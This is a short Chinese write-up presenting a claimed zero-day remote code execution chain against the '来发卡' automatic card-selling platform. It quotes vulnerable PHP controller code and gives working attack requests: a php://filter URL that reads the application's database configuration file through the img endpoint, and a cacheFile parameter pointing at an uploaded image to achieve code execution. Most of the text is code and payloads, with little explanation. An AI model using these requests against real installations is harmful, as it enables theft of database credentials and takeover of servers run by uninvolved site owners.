来发卡自动发卡平台审计+组合拳RCE(0day)

/*** 微信图片显示*/public function img(){    $url = $this->request->get('url', '');    $filename = FileService::getFileName($url, 'jpg', 'tmp/');    if (false === ($img = FileService::getFileUrl($filename))) {      $info = FileService::save($filename, file_get_contents($url));      $img = (is_array($info) && isset($info['url'])) ? $info['url'] : $url;    }    $this->redirect($img);  }

public static function getFileName($location, $ext = '', $pre = ''){  return $pre . join('/', str_split(md5($location), 16)) . '.' . $ext;}

/*** 根据当前配置存储文件* @param string $filename* @param string $content* @param string|null $file_storage* @return array|false*/public static function save($filename, $content, $file_storage = null){    $type = empty($file_storage) ? sysconf('storage_type') : $file_storage;    if (!method_exists(__CLASS__, $type)) {      Log::error("保存存储失败，调用{$type}存储引擎不存在！");      return false;    }    return self::$type($filename, $content);  }

/wechat/Review/img?url=php://filter/read=/resource=application/database.php

/*** 显示手机预览* @return string*/public function index(){    $get = $this->request->get();    $content = str_replace("n", "<br>", $this->request->get('content', '')); // 内容    $type = $this->request->get('type', 'text'); // 类型    $this->assign('type', $type);    // 图文处理    if ($type === 'news' && is_numeric($content) && !empty($content)) {      $news = WechatService::getNewsById($content);      $this->assign('articles', $news['articles']);    }    // 文章预览    if ($type === 'article' && is_numeric($content) && !empty($content)) {      $article = Db::name('WechatNewsArticle')->where('id', $content)->find();      if (!empty($article['content_source_url'])) {        $this->redirect($article['content_source_url']);      }      $this->assign('vo', $article);    }    $this->assign($get);    $this->assign('content', $content);    // 渲染模板并显示    return view();  }

/wechat/Review?cacheFile=./图片路径